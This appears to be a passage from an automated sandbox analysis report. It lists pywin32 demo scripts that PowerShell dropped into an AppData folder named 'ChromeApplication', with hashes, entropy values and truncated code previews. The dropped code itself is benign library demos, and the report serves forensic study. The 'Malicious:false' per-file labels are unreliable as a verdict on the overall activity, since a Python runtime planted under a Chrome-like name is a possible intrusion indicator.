                                                                                                                                                                                                  SSDEEP:96:Yrcny/jWiv5k/IDkdU/pqygiK9uJarxIn2e7h8HjU:Y+y/jWiv5k/IgwqCKhWjwU
                                                                                                                                                                                                  MD5:9DB47F76ED6E8A88CBE1E4B9F23CE295
                                                                                                                                                                                                  SHA1:24630AB98FFAF3B001F7F7F85CE9B8265BF53C63
                                                                                                                                                                                                  SHA-256:2AD30A8C118FA254D47A4C31E04B5D16524B486A80C7DEB4A9381052B786B0B5
                                                                                                                                                                                                  SHA-512:05046DA2645B83997EB094A1FED82D2BFA4E84C2841B4792DAE44933376D1926D1F3B9B96DDE8DD486DCBC1271EB05683D5A57C8528F75128CA43715A74B9A04
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32process.import win32security..## You need SE_RESTORE_NAME to be able to set the owner of a security descriptor to anybody.## other than yourself or your primary group. Most admin logins don't have it by default, so.## enabling it may fail.new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivileg

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\setuserobjectsecurity.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3382
                                                                                                                                                                                                  Entropy (8bit):5.237699635064882
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:eny/jWmJv5zAS/YIDkh3pkinPPS5hMbo3aA6K8GoQdlTpr:eny/jWiv5k/IDkdHqIE3ai8RWHr
                                                                                                                                                                                                  MD5:7DCADEC88612DD294016B68E78555986
                                                                                                                                                                                                  SHA1:8944F04FBDDB40F986D6BBC56D91C9458568F2AC
                                                                                                                                                                                                  SHA-256:4A6A9531E547F1B37C95633D70C0187C42EC814E8754C1BFA2E49C105CC4953E
                                                                                                                                                                                                  SHA-512:50837D9BA259B0F9DF8DC9F82CD3FEFF30952879AF9AEC1E2077E53E8316F5499D119B52309F5D042F543DB0D41368BDC8FA902611CE23B850077FD3FB4170FE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32process.import win32security..new_privs = (. (. win32security.LookupPrivilegeValue("", win32security.SE_SECURITY_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TCB_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_SHUTDOWN_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_TAKE_OWNERSHIP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_CREATE_PERMANENT_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", win32security.SE_ENABLE_DELEGATION_NAME),. win32con.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\sspi\fetch_url.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5481
                                                                                                                                                                                                  Entropy (8bit):4.3341623144023025
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vWoYyit70UN8J99Vyiu6SuuC+D8d6o1lyEfZVw:Z5it707yiTSFXwd71lyEfZVw
                                                                                                                                                                                                  MD5:4FB50CD03A213D9C3696D05DD228F03F
                                                                                                                                                                                                  SHA1:F6C604FD9A3B939D350C76623D0556DF412913F3
                                                                                                                                                                                                  SHA-256:5F10CB276CCAA10D00FBD01126B316C045DC26D65C2F5F03825D19084D44048D
                                                                                                                                                                                                  SHA-512:BC5FB9C1978733BF174E70B8956BEA1641D6B066AEEE499C5212CC55D72B646B4D6AF8A5106AC3F1FC744DC1D0CD5986EDD7EC8BAD1F039BF4E93125612EA179
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""".Fetches a URL from a web-server supporting NTLM authentication.eg, IIS...If no arguments are specified, a default of http://localhost/localstart.asp.is used. This script does follow simple 302 redirections, so pointing at the.root of an IIS server is should work.."""..import http.client # sorry, this demo needs 2.3+.import optparse.import urllib.error.import urllib.parse.import urllib.request.from base64 import decodestring, encodestring..from sspi import ClientAuth..options = None # set to optparse options object...def open_url(host, url):. h = http.client.HTTPConnection(host). # h.set_debuglevel(9). h.putrequest("GET", url). h.endheaders(). resp = h.getresponse(). print("Initial response is", resp.status, resp.reason). body = resp.read(). if resp.status == 302: # object moved. url = "/" + resp.msg["location"]. resp.close(). h.putrequest("GET", url). h.endheaders(). resp = h.getresponse(). print("After redire

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\sspi\simple_auth.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2857
                                                                                                                                                                                                  Entropy (8bit):5.268166314469273
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OcDheGUbSo31BtMhZJpu31qkMqwzzqgq0qQGnIHsorrI+JTYnSJY50C+c9wyMDRJ:7eGwBtMbJo1qkMqizqgq0qxnIhrMV0cq
                                                                                                                                                                                                  MD5:C903127F2939DF13251320C082311B90
                                                                                                                                                                                                  SHA1:6F6DF731BE829317C134B731817939DEBE071A97
                                                                                                                                                                                                  SHA-256:F76852F275C183F907DF441FF63A9A53BC48DC725331D3DCAB3848A41A5EA32F
                                                                                                                                                                                                  SHA-512:747A8E05304303EF8AAFFF2D46FA3D858967B05DD31BA13CDAE698EFF4E553CE6793303FA65B2C13234874E979A24DF4F587C9A79AF9502388BB4CE83F76202A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo of basic SSPI authentication..# There is a 'client' context and a 'server' context - typically these will.# be on different machines (here they are in the same process, but the same.# concepts apply).import sspi.import sspicon.import win32api.import win32security...def lookup_ret_code(err):. for k, v in list(sspicon.__dict__.items()):. if k[0:6] in ("SEC_I_", "SEC_E_") and v == err:. return k...""".pkg_name='Kerberos'.sspiclient=SSPIClient(pkg_name, win32api.GetUserName(), ## target spn is ourself. None, None, ## use none for client name and authentication information for current context. ## u'username', (u'username',u'domain.com',u'passwd'),. sspicon.ISC_REQ_INTEGRITY|sspicon.ISC_REQ_SEQUENCE_DETECT|sspicon.ISC_REQ_REPLAY_DETECT| \. sspicon.ISC_REQ_DELEGATE|sspicon.ISC_REQ_CONFIDENTIALITY|sspicon.ISC_REQ_USE_SESSION_KEY).sspiserver=SSPIServer(pkg_name, None,. sspicon.ASC_REQ_INTEGRITY|sspicon.ASC_REQ_SEQUENCE_DETECT|sspicon.ASC_RE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\sspi\socket_server.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6361
                                                                                                                                                                                                  Entropy (8bit):4.427558647447183
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:M33Chyu7QCY4fZ9VCNasbYWdrdZE+wToisvEo0Wst0mTjg9/Z+RV8X:MCgsuuCNaSY0ZE+ZvQWst0ejgebO
                                                                                                                                                                                                  MD5:75D5A35B4EE8B8DC4E4FDD5B5400584B
                                                                                                                                                                                                  SHA1:4EE7C6CF3B71822A268672C2405C1509916333DC
                                                                                                                                                                                                  SHA-256:9A9AF6C5EF6044CA082AEDE43EBFCEE1917B7DEC1F377323B679F1F2330673DF
                                                                                                                                                                                                  SHA-512:5DCBB7B5A989C7D26861BC23D60AA79B014B4A172CD9C4401C8BEFB88A53F8928A83A60CD3813B2ECA2A85676A5A572AFD74FE2A0B43920E76AE74ADF542B217
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A sample socket server and client using SSPI authentication and encryption...You must run with either 'client' or 'server' as arguments. A server must be.running before a client can connect...To use with Kerberos you should include in the client options.--target-spn=username, where 'username' is the user under which the server is.being run...Running either the client or server as a different user can be informative..A command-line such as the following may be useful:.`runas /user:{user} {fqp}\python.exe {fqp}\socket_server.py --wait client|server`..{fqp} should specify the relevant fully-qualified path names...To use 'runas' with Kerberos, the client program will need to.specify --target-spn with the username under which the *server* is running...See the SSPI documentation for more details.."""...import http.client # sorry, this demo needs 2.3+.import optparse.import socketserver.import struct.import traceback..import sspi.import win32api.import win32security..options = None # se

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\security\sspi\validate_password.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1128
                                                                                                                                                                                                  Entropy (8bit):4.72989402530247
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:JgRTg/scLBkLesqldQsC4WgWNoLIpDbF898iLyxsYkuN4mRe:JGgk6Bzs+dxrvLIxbF898iLyiYHKmA
                                                                                                                                                                                                  MD5:7BD62BDDEA1DCCC3865FAA118C757D2C
                                                                                                                                                                                                  SHA1:B61E0C8977189AB067449C38D2A1D6284D61C25F
                                                                                                                                                                                                  SHA-256:1A3DABD6ED521A3D0D4F9B5C08B888C31F5BCF4279FE8CC7B2C98210F77936F9
                                                                                                                                                                                                  SHA-512:4ED8BCE08C20A18110A1FCD97C26CE5B6B1CF82EB755F8F72DE72693742E1726AAA455461139FE30154CD5D4C10723E33097EE33AC1439E62FC7676B73E99668
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Demonstrates how to validate a password..# See also MSKB article Q180548.#.# To use with Kerberos you need to jump through the 'targetspn' hoops...import sys..import win32security.from sspi import ClientAuth, ServerAuth...def validate(username, password, domain=""):. auth_info = username, domain, password. ca = ClientAuth("NTLM", auth_info=auth_info). sa = ServerAuth("NTLM").. data = err = None. while err != 0:. err, data = ca.authorize(data). err, data = sa.authorize(data). # If we get here without exception, we worked!...if __name__ == "__main__":. if len(sys.argv) not in [2, 3, 4]:. print("Usage: %s username [password [domain]]" % (__file__,)). sys.exit(1).. # password and domain are optional!. password = None. if len(sys.argv) >= 3:. password = sys.argv[2]. domain = "". if len(sys.argv) >= 4:. domain = sys.argv[3]. try:. validate(sys.argv[1], password, domain). print("Validated OK").

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\service\nativePipeTestService.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2135
                                                                                                                                                                                                  Entropy (8bit):4.562211316978868
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:A07kBblOiMGpg1DMjtqyNycLNH7aJEywPfo4E4tLgO8M:A07kBZOFSgQsyRLZC4osgO8M
                                                                                                                                                                                                  MD5:4F13CA50A137FD86C6F22E1F0082970F
                                                                                                                                                                                                  SHA1:5E24BA918FFD189703DC09360460C870B6C9E9A7
                                                                                                                                                                                                  SHA-256:2970786059E4DB3E95D38D38A6BBF6A16D4E520FE077BF8D86582106673A20B7
                                                                                                                                                                                                  SHA-512:8BCFDA29A39851B622DCA268474F1FCB61E3E7C66FE3980D314B57A956BB72CFA324BE19F82F5D8D6F193A17571B91B09D91D7100D899D587890FEABE146990A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is an example of a service hosted by python.exe rather than.# pythonservice.exe...# Note that it is very rare that using python.exe is a better option.# than the default pythonservice.exe - the latter has better error handling.# so that if Python itself can't be initialized or there are very early.# import errors, you will get error details written to the event log. When.# using python.exe instead, you are forced to wait for the interpreter startup.# and imports to succeed before you are able to effectively setup your own.# error handling...# So in short, please make sure you *really* want to do this, otherwise just.# stick with the default...import os.import sys..import servicemanager.import win32serviceutil.from pipeTestService import TestPipeService...class NativeTestPipeService(TestPipeService):. _svc_name_ = "PyNativePipeTestService". _svc_display_name_ = "Python Native Pipe Test Service". _svc_description_ = "Tests Python.exe hosted services". # tell win32serv

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\service\pipeTestService.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):6893
                                                                                                                                                                                                  Entropy (8bit):4.585752418885161
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:C7hRuRwOeqkUJcSC8dccc6sfQ0ulF8C8twh7KPAcCLp/2cAdqOJ:C+y/ocSC8Kcc6MQX7jFKPAHuPdPJ
                                                                                                                                                                                                  MD5:B21995DADB96151A3178C89778F5821F
                                                                                                                                                                                                  SHA1:592856A829A06EB302353B70E7B0999F50A885EC
                                                                                                                                                                                                  SHA-256:6EA910AC3A4B58C77F4B312753F894367DCA3FADB5A23D1F70A60526CA7F1133
                                                                                                                                                                                                  SHA-512:1AD8A118582AB2D8CD145B219347F0216E2FB73AF3ACC57DD25E1EB8074D7D81C3599C5DA864F26686688E142DEAF74AC7F18435483F10B7DDC4C97FD70EB42B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A Demo of services and named pipes...# A multi-threaded service that simply echos back its input...# * Install as a service using "pipeTestService.py install".# * Use Control Panel to change the user name of the service.# to a real user name (ie, NOT the SystemAccount).# * Start the service..# * Run the "pipeTestServiceClient.py" program as the client pipe side...import _thread.import traceback..# Old versions of the service framework would not let you import this.# module at the top-level. Now you can, and can check 'Debugging()' and.# 'RunningAsService()' to check your context..import pywintypes.import servicemanager.import win32con.import win32service.import win32serviceutil.import winerror.from ntsecuritycon import *.from win32api import *..# Use "import *" to keep this looking as much as a "normal" service.# as possible. Real code shouldn't do this..from win32event import *.from win32file import *.from win32pipe import *...def ApplyIgnoreError(fn, args):. try:. ret

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\service\pipeTestServiceClient.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4481
                                                                                                                                                                                                  Entropy (8bit):4.484804480076562
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:mRjd2OzAT63NFgwgihr8rbSw3SFm05GN8EVE6i:mRjE0f3D7h+b13Il52vVE6i
                                                                                                                                                                                                  MD5:40792A85E480392D45275CF67BE01422
                                                                                                                                                                                                  SHA1:9CBD58C86FC710B6C4CEC25B375503C445F92256
                                                                                                                                                                                                  SHA-256:B4A535554E7553743175B46A37DD038F01A32ACFF72D965C8EDC72AEE7676C06
                                                                                                                                                                                                  SHA-512:E82BB319609EADDFFE0491149F2F37CE227A9CC7D74845482F0BF8FA694C3E0A0E8A360EE87057AF08D71945E55E3D1D1E334A9171E58E100142A2643E96617B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A Test Program for pipeTestService.py.#.# Install and start the Pipe Test service, then run this test.# either from the same machine, or from another using the "-s" param..#.# Eg: pipeTestServiceClient.py -s server_name Hi There.# Should work...import os.import sys.import traceback..import pywintypes.import win32api.import winerror.from win32event import *.from win32file import *.from win32pipe import *..verbose = 0..# def ReadFromPipe(pipeName):.# Could (Should?) use CallNamedPipe, but this technique allows variable size.# messages (whereas you must supply a buffer size for CallNamedPipe!.# hPipe = CreateFile(pipeName, GENERIC_WRITE, 0, None, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0).# more = 1.# while more:.# hr = ReadFile(hPipe, 256).# if hr==0:.# more = 0.# except win32api.error (hr, fn, desc):.# if hr==winerror.ERROR_MORE_DATA:.# data = dat.#...def

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\service\serviceEvents.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4075
                                                                                                                                                                                                  Entropy (8bit):4.913580202147345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:VGAe4yOAJf2klecrcxNokZs9eW8cpkYQQzQ/G3p3f5VF1cTIl5QXoJsbw:Yayffr06k29QcGNHO1/F1cm5K+Iw
                                                                                                                                                                                                  MD5:1736FD061AD70B0C9452E0EB63E7699E
                                                                                                                                                                                                  SHA1:75BE37D779E98DC848215BF5CA9A34B98071BD39
                                                                                                                                                                                                  SHA-256:5C6BB64EA8E1BF7B7011C6464E90ACB155F3C88AD1EDEEE520DC528571E815C1
                                                                                                                                                                                                  SHA-512:B9058CC59105489A0C6FA86AF15CDD07FC8F765033446CE0649667A62599656CCDA556B7444963812930DB01357DB03F9F8DB6A404D3AB7FED889B9147AB4783
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A Demo of a service that takes advantage of the additional notifications.# available in later Windows versions...# Note that all output is written as event log entries - so you must install.# and start the service, then look at the event log for messages as events.# are generated...# Events are generated for USB device insertion and removal, power state.# changes and hardware profile events - so try putting your computer to.# sleep and waking it, inserting a memory stick, etc then check the event log..# Most event notification support lives around win32gui.import servicemanager.import win32con.import win32event.import win32gui.import win32gui_struct.import win32service.import win32serviceutil..GUID_DEVINTERFACE_USB_DEVICE = "{A5DCBF10-6530-11D2-901F-00C04FB951ED}"...class EventDemoService(win32serviceutil.ServiceFramework):. _svc_name_ = "PyServiceEventDemo". _svc_display_name_ = "Python Service Event Demo". _svc_description_ = (. "Demonstrates a Python service which

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\timer_demo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2193
                                                                                                                                                                                                  Entropy (8bit):4.521126122680342
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xgD61DVymdypV5MjDABsHOPvKXQ6HOIuc4bqFhc7EfjhNm2on:Q615ndypMDABUOPPvI4eFeALhk2on
                                                                                                                                                                                                  MD5:CD4A7FC5E4FD347037BB7256850B9B56
                                                                                                                                                                                                  SHA1:2CE36FC7871F79810038D810613F5A4D796D17CA
                                                                                                                                                                                                  SHA-256:9628F439FEABE60861DC4EDF838164A81500628FD70D9A43444B08CF50F55CDB
                                                                                                                                                                                                  SHA-512:D82B58C53C992430214909CF7F0E4F74BA711E76578A54457AFC805C11B591286FFFEB58EDE69A04E0A6F8063631E9062A234019E32A1828F9CDC8363AB6556B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- Mode: Python; tab-width: 4 -*-.#..# This module, and the timer.pyd core timer support, were written by.# Sam Rushing (rushing@nightmare.com)..import time..# Timers are based on Windows messages. So we need.# to do the event-loop thing!.import timer.import win32event.import win32gui..# glork holds a simple counter for us....class glork:. def __init__(self, delay=1000, max=10):. self.x = 0. self.max = max. self.id = timer.set_timer(delay, self.increment). # Could use the threading module, but this is. # a win32 extension test after all! :-). self.event = win32event.CreateEvent(None, 0, 0, None).. def increment(self, id, time):. print("x = %d" % self.x). self.x = self.x + 1. # if we've reached the max count,. # kill off the timer.. if self.x > self.max:. # we could have used 'self.id' here, too. timer.kill_timer(id). win32event.SetEvent(self.event)...# create a counte

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32clipboardDemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4666
                                                                                                                                                                                                  Entropy (8bit):4.668774222762782
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SvkHtf4HomAM/yjHGnav57yjKATlbbnonaYBPYbhkw9zCa/qSbNzw1z:S+f4Im3cGn67P43onYhL9vVxs
                                                                                                                                                                                                  MD5:DB58629AA113EDAC46DE260EBFBAD2BE
                                                                                                                                                                                                  SHA1:3C51C981260093C562341E841C532C315F333C8C
                                                                                                                                                                                                  SHA-256:D8492408E4957D3AA6C2F828E516537A5001890243BDF1F07570D22EA070CEDF
                                                                                                                                                                                                  SHA-512:FEB1C5F901E6E6CF1E1C5E0F98C5FC545EF2590CB3406C34CF2A774A46002571E5C1C6A36A3F5A0D544BB594333776653B1E8C6CF1B12AF9BFB6C805CF8295CA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# win32clipboardDemo.py.#.# Demo/test of the win32clipboard module...import win32con.from pywin32_testutil import str2bytes # py3k-friendly helper.from win32clipboard import *..if not __debug__:. print("WARNING: The test code in this module uses assert"). print("This instance of Python has asserts disabled, so many tests will be skipped")..cf_names = {}.# Build map of CF_* constants to names..for name, val in list(win32con.__dict__.items()):. if name[:3] == "CF_" and name != "CF_SCREENFONTS": # CF_SCREEN_FONTS==CF_TEXT!?!?. cf_names[val] = name...def TestEmptyClipboard():. OpenClipboard(). try:. EmptyClipboard(). assert (. EnumClipboardFormats(0) == 0. ), "Clipboard formats were available after emptying it!". finally:. CloseClipboard()...def TestText():. OpenClipboard(). try:. text = "Hello from Python". text_bytes = str2bytes(text). SetClipboardText(text). got = GetClipboardData(win32co

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32clipboard_bitmapdemo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3905
                                                                                                                                                                                                  Entropy (8bit):4.396194918375346
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:iOMbbuK52jUCVYqT7jQ3eGi+KL44cd12xXtACc2eGzqQ3mRsG4m:ihbbeBVN7jyi+KU4Ju2usGv
                                                                                                                                                                                                  MD5:258A699983426F66EB6440D4B1E0D34E
                                                                                                                                                                                                  SHA1:026B32F8A76C1B6F955EAB426AE3597ED4FCDF09
                                                                                                                                                                                                  SHA-256:905279066C8F55C7BC6376D4B583918BB5CEE1547E37B8328245112EA1155C1B
                                                                                                                                                                                                  SHA-512:F3DC2BC0EEBA1B3812AA9BF7FB16D2F882FE252E718219C88628E0BE10247156733A09F6928C9044760A0492906E490A286FC1084CCAD5BF0ABC09B37E491E8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api.import win32clipboard.import win32con.import win32gui...class ViewerWindow:. def __init__(self):. self.hwndNextViewer = None.. def OnPaint(self, hwnd, msg, wp, lp):. dc, ps = win32gui.BeginPaint(hwnd). wndrect = win32gui.GetClientRect(hwnd). wndwidth = wndrect[2] - wndrect[0]. wndheight = wndrect[3] - wndrect[1]. win32clipboard.OpenClipboard(). try:. try:. hbitmap = win32clipboard.GetClipboardData(win32clipboard.CF_BITMAP). except TypeError:. font = win32gui.LOGFONT(). font.lfHeight = 15 # int(wndheight/20). font.lfWidth = 15 # font.lfHeight. # font.lfWeight=150. hf = win32gui.CreateFontIndirect(font). win32gui.SelectObject(dc, hf). win32gui.SetBkMode(dc, win32con.TRANSPARENT). win32gui.SetTextColor(dc, win32api.RGB(0, 0, 0)). win32gu

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32comport_demo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5536
                                                                                                                                                                                                  Entropy (8bit):4.562610287492588
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:LAmlRZGu6O+K3Yf5ssjT0ALmjgriErdNTm5GD+TtXN4Brr:LybK3YhssPDKjgriEr3i5/tdk/
                                                                                                                                                                                                  MD5:3A3B78735045BCDA323C1454A8A6524F
                                                                                                                                                                                                  SHA1:2E9A0AB51D615E7717C8ED3A51A8AA24D3975F5C
                                                                                                                                                                                                  SHA-256:5E8F4A7A26DF3EECFABAF58DF88E291C1A90EC87DCB40C51123E006832C82D89
                                                                                                                                                                                                  SHA-512:235B679DCE556F5F9CCBDF995EDDCC43019098284B9D8342CA1940F6BBBEE658148AD519B3E29BF70490E1B3521242F5CC1BD03B977F4D760FF89A1EFFE0E0A6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# This is a simple serial port terminal demo..#.# Its primary purpose is to demonstrate the native serial port access offered via.# win32file...# It uses 3 threads:.# - The main thread, which cranks up the other 2 threads, then simply waits for them to exit..# - The user-input thread - blocks waiting for a keyboard character, and when found sends it.# out the COM port. If the character is Ctrl+C, it stops, signalling the COM port thread to stop..# - The COM port thread is simply listening for input on the COM port, and prints it to the screen...# This demo uses userlapped IO, so that none of the read or write operations actually block (however,.# in this sample, the very next thing we do _is_ block - so it shows off the concepts even though it.# doesnt exploit them...import msvcrt # For the getch() function..import sys.import threading..import win32con # constants..from win32event import * # We use events and the WaitFor[Multiple]Objects functions..from win32file import * # The

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\win32console_demo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5109
                                                                                                                                                                                                  Entropy (8bit):4.7421972636330745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:fJUKEFxFgO1PPfJM7FxFgyFtF9VCFGFJFxFZFtFuFHFSFr:nE75fG77Wyv9Cg/3PbgFsR
                                                                                                                                                                                                  MD5:867D26ABCB67E383F5648184D67E050B
                                                                                                                                                                                                  SHA1:B7030E5399DA5BD59F903CB050D8812346C4BEAB
                                                                                                                                                                                                  SHA-256:5361F5BF72F2598DCB4D505A1C74D969A12A96EF80FA14F00AB8E1FD63AF2152
                                                                                                                                                                                                  SHA-512:A8BD3C68FF367C9036A8A20A15465E3404A646F5639D8AE30E14335C72C511E008816A0325FE40C4FC37A662FC6B894AFFBC01AC248FF98A482056A8CF53CFC2
                                                                                                                                                                                                  Malicious:false
